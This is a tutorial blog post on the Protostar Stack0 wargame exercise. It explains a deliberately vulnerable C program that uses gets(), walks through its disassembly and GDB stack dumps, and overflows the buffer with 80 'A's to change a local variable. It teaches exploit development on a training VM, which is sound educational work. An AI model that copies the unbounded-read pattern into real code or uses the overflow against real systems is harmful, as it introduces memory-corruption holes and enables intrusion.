Reverse Engineering and Exploit Development Made Easy: Linux Buffer Overflows – Memory Corruption

Introduction

In this post, we will dive into the basics of Linux exploitation, starting with the first class of bug: stack buffer overflows. We will begin with memory corruption, which will give us a good understanding of how a program’s memory is laid out on Linux, and from there we will gradually make our way into developing a complete exploit.

Setup

Protostar’s exploit exercises VM ( https://exploit-exercises.lains.space/protostar/ ) is a great resource that will help us on our journey, along with OverTheWire’s Narnia wargame.

So grab an ISO from Protostar, and set it up in your virtual machine manager of choice. I will be using VirtualBox as always. We will use ssh to log into this VM (use hostname -I to get the local IP of the VM). The default credentials for Protostar are user:user.

Tools

For Linux, the choice of debuggers isn’t as varied as on Windows. Throughout our journey, we will mainly be using GDB (the GNU Debugger), the standard debugger on most Linux distributions. You can alternatively use EDB.

As we progress, we will see how we can pimp GDB up to do all sorts of cool tricks, and develop exploits with ease (spoiler alert: gdb-peda 😉).

Static Code Analysis

To see the source code of the challenge, we have to navigate to the exploit exercises website, where the source code for all challenges is given. We will be starting with the Stack0 challenge, which focuses on memory corruption. Take a look at the code below:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  modified = 0;
  gets(buffer);

  if(modified != 0) {
      printf("you have changed the 'modified' variable\n");
  } else {
      printf("Try again?\n");
  }
}

The includes just pull in the usual C headers. stdlib.h is the general-purpose standard library header, covering memory allocation, process control, etc.

unistd.h is a header file that provides access to the POSIX OS API.

stdio.h is the standard input/output header, which declares I/O functions such as gets() and printf().

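The main function declares two local variables: buffer, an array of 64 characters, and modified, a volatile integer. The volatile qualifier tells the compiler that the variable may change in ways it cannot see, so it must actually read modified from memory for the comparison instead of optimizing the check away. main also takes the usual argc and argv parameters, but this program never uses them; all of our input arrives on standard input.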

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

modified is initially set to 0. The line below that calls gets(), which reads a line from standard input and stores its characters in buffer. Nothing is printed at this point.

 modified = 0;
 gets(buffer);

Now here is where our vulnerability lies: the gets() function. gets() is never told how big the buffer is, so it does no size check whatsoever; it keeps copying our input on to the stack until it finds a newline (or the end of input). Which means that if we enter a string longer than 64 bytes, it will OVERFLOW outside the given buffer and start to overwrite whatever lies next to it on the stack, until our string ends.

In this case, we need to change the value of the modified variable, which is located somewhere on the stack. The if-else conditions tell us that we succeed once we change the value of the modified variable from 0 to anything else (i.e. not equal to (!=) 0).

if(modified != 0) {
    printf("you have changed the 'modified' variable\n");
} else {
    printf("Try again?\n");
}

Alrighty then! Now that we have analyzed the code completely, let us start debugging the binary in order to understand where our variables lie on the stack, and how our input affects it. I will be using GDB to debug the binary.

So first, fire up the Protostar VM, and use the command hostname -I to display the local IP address of the VM. I suggest that you use a Bridged Adapter while setting up the VM, and set the adapter to the current interface that’s being used. That way, the VM will be on your network and you can easily ssh into it. Binaries are located in /opt/protostar/bin/.

Debugging

To open the binary in GDB, we will use the command $ gdb stack0, followed by the command disas main inside gdb, which will disassemble the main function for us. What you see is a representation of the binary in assembly.

0x080483f4 <main+0>:    push   %ebp
0x080483f5 <main+1>:    mov    %esp,%ebp
0x080483f7 <main+3>:    and    $0xfffffff0,%esp
0x080483fa <main+6>:    sub    $0x60,%esp
0x080483fd <main+9>:    movl   $0x0,0x5c(%esp)
0x08048405 <main+17>:    lea    0x1c(%esp),%eax
0x08048409 <main+21>:    mov    %eax,(%esp)
0x0804840c <main+24>:    call   0x804830c <gets@plt>
0x08048411 <main+29>:    mov    0x5c(%esp),%eax
0x08048415 <main+33>:    test   %eax,%eax
0x08048417 <main+35>:    je     0x8048427 <main+51>
0x08048419 <main+37>:    movl   $0x8048500,(%esp)
0x08048420 <main+44>:    call   0x804832c <puts@plt>
0x08048425 <main+49>:    jmp    0x8048433 <main+63>
0x08048427 <main+51>:    movl   $0x8048529,(%esp)
0x0804842e <main+58>:    call   0x804832c <puts@plt>
0x08048433 <main+63>:    leave  
0x08048434 <main+64>:    ret

So right off the bat, even if you don’t understand assembly too well, you can see the call instruction at the address 0x0804840c, which calls the function gets(). This will come in handy during testing.

So a few things before we continue:

ESP is our stack pointer. This points to the start/top of the stack.
PUSH is an instruction which pushes a value (here, the contents of a register) on to the top of the stack.
JMP is an instruction which will jump to a particular address to continue execution flow. JE is “jump if equal”: it jumps only if the zero flag is set. The test %eax,%eax instruction just before it ANDs EAX with itself and sets the zero flag when the result is 0, so the jump is taken exactly when modified is 0. This pair represents the “if-else” branch in our code.

Our objective here is to change the value of the modified variable from 0 to anything else. Modified is somewhere on the stack, and in order to overwrite it with our desired value, we will have to overflow a section of the stack that lies before this variable in order to reach it.

There is one line in the disassembly that is particularly interesting though: movl $0x0,0x5c(%esp) moves the value 0 (hex 0x0) to the location esp + 0x5c.
This is the modified = 0 assignment, so it tells us the location of the modified variable on the stack. Now, we will set our breakpoints on the call instruction from earlier and on the instruction right after it (main+29), which loads modified back from the stack. A breakpoint is a pause in the execution flow of the binary, which will help us in understanding how values on the stack change after a particular instruction is executed.

We will do this by executing:

(gdb) break *0x0804840c
Breakpoint 1 at 0x804840c: file stack0/stack0.c, line 11.
(gdb) break *0x08048411
Breakpoint 2 at 0x8048411: file stack0/stack0.c, line 13.
(gdb)

This will stop the execution flow before the call to gets() is made, and after that, before the value of modified is transferred to the accumulator (eax) for comparison. Now, let’s run the binary by executing r.

(gdb) r
Starting program: /opt/protostar/bin/stack0

Breakpoint 1, 0x0804840c in main (argc=1, argv=0xbffffd54) at stack0/stack0.c:11

So we hit our first breakpoint, right before the call to gets(). If we run i r, it will give us further information on the registers at this point of time.

(gdb) i r
eax            0xbffffc5c    -1073742756
ecx            0x644d8780    1682802560
edx            0x1    1
ebx            0xb7fd7ff4    -1208123404
esp            0xbffffc40    0xbffffc40
ebp            0xbffffca8    0xbffffca8
esi            0x0    0
edi            0x0    0
eip            0x804840c    0x804840c <main+24>
eflags         0x200282    [ SF IF ID ]
cs             0x73    115
ss             0x7b    123
ds             0x7b    123
es             0x7b    123
fs             0x0    0
gs             0x33    51

We can see that the address of the call instruction is in the EIP register. EIP holds the address of the next instruction to be executed. Now, let’s take a look at what the stack looks like right now by executing x/32wx $esp. This will print 32 hexadecimal words off the stack, starting at ESP. The count of 32 is arbitrary; it is just enough to cover our whole stack frame.

(gdb) x/32wx $esp
0xbffffc40:    0xbffffc5c  0x00000001  0xb7fff8f8  0xb7f0186e
0xbffffc50:    0xb7fd7ff4  0xb7ec6165  0xbffffc68  0xb7eada75
0xbffffc60:    0xb7fd7ff4  0x08049620  0xbffffc78  0x080482e8
0xbffffc70:    0xb7ff1040  0x08049620  0xbffffca8  0x08048469
0xbffffc80:    0xb7fd8304  0xb7fd7ff4  0x08048450  0xbffffca8
0xbffffc90:    0xb7ec6365  0xb7ff1040  0x0804845b  0x00000000
0xbffffca0:    0x08048450  0x00000000  0xbffffd28  0xb7eadc76
0xbffffcb0:    0x00000001  0xbffffd54  0xbffffd5c  0xb7fe1848

We can use this to find the location of the modified variable. To find the address, we execute x/wx $esp+0x5c, as we know from earlier that the variable is stored at the location $esp+0x5c or 0x5c(%esp). x stands for ‘examine’, and the /wx suffix asks for one word printed in hexadecimal, so this will give us the address and the contents of modified.

(gdb) x/wx $esp+0x5c
0xbffffc9c:    0x00000000

From this, we can see that the address of modified on the stack is 0xbffffc9c, and it contains 0. So if we correspond this with our stack print from earlier, this is where modified is:

                          These are contents
           |---------------------|---------------------|
           |                                           |
0xbffffc90: 0xb7ec6365 0xb7ff1040 0x0804845b 0x00000000 <---- modified

Addresses:  0xbffffc90 0xbffffc94 0xbffffc98 0xbffffc9c

Each word here is 4 bytes long, and the address before the colon is that of the first word in the row. If we add 4 bytes to c90 three times until we reach 0x00000000, we get the address c9c. This is how the math works out in GDB.

Now, let’s continue execution flow by executing c. Then, let’s just enter a few A’s just as a test. That way, we will know the location of our buffer on the stack.

(gdb) c
Continuing.
AAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 2, main (argc=1, argv=0xbffffd54) at stack0/stack0.c:13
13    in stack0/stack0.c

We hit our second breakpoint, which is right before the binary moves the value of modified to EAX for the comparison (the if-else branch). Now, let’s take a look at the stack:

(gdb) x/32wx $esp
0xbffffc40:    0xbffffc5c  0x00000001  0xb7fff8f8  0xb7f0186e
0xbffffc50:    0xb7fd7ff4  0xb7ec6165  0xbffffc68  0x41414141
0xbffffc60:    0x41414141  0x41414141  0x41414141  0x41414141
0xbffffc70:    0x41414141  0x41414141  0xbffffc00  0x08048469
0xbffffc80:    0xb7fd8304  0xb7fd7ff4  0x08048450  0xbffffca8
0xbffffc90:    0xb7ec6365  0xb7ff1040  0x0804845b  0x00000000 <-----
0xbffffca0:    0x08048450  0x00000000  0xbffffd28  0xb7eadc76
0xbffffcb0:    0x00000001  0xbffffd54  0xbffffd5c  0xb7fe1848

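So the hexadecimal value of A is 0x41. We can see our A’s starting at the last word of the 0xbffffc50 row, i.e. at 0xbffffc5c. This is where our buffer starts, which matches esp + 0x1c from the lea instruction and the value of EAX at the first breakpoint. We can also see that we still have not reached the modified variable, which is why we haven’t been able to overwrite its value. Remember the size of our buffer? 64. modified sits at esp + 0x5c, exactly 64 bytes (0x5c - 0x1c = 0x40) after the start of the buffer, so any input longer than 64 bytes will reach it. Let’s enter 80 A’s to make the overflow easy to spot and give this a shot: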

(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/stack0

Breakpoint 1, 0x0804840c in main (argc=1, argv=0xbffffd54) at stack0/stack0.c:11
11    in stack0/stack0.c
(gdb) c
Continuing.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 2, main (argc=1, argv=0xbffffd54) at stack0/stack0.c:13
13    in stack0/stack0.c

(gdb) x/32wx $esp
0xbffffc40:    0xbffffc5c  0x00000001  0xb7fff8f8  0xb7f0186e
0xbffffc50:    0xb7fd7ff4  0xb7ec6165  0xbffffc68  0x41414141
0xbffffc60:    0x41414141  0x41414141  0x41414141  0x41414141
0xbffffc70:    0x41414141  0x41414141  0x41414141  0x41414141
0xbffffc80:    0x41414141  0x41414141  0x41414141  0x41414141
0xbffffc90:    0x41414141  0x41414141  0x41414141  0x41414141 <----
0xbffffca0:    0x41414141  0x41414141  0x41414141  0xb7eadc00
0xbffffcb0:    0x00000001  0xbffffd54  0xbffffd5c  0xb7fe1848

Et voilà! We have overwritten the value of the modified variable, and also overwritten everything that comes after it on the stack with our A’s. Let’s do this outside of GDB now:

$ echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | ./stack0
you have changed the 'modified' variable
Segmentation fault

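The segmentation fault is expected: our 80 bytes ran well past modified and also trampled the saved frame pointer and part of the saved return address, so main most likely returned to a bad address. We have completed our first memory corruption exercise! This lays the foundation for stack buffer overflows, so if you’ve made it this far give yourself a good pat on the back! That’s all for now! I’ll see you in the next post!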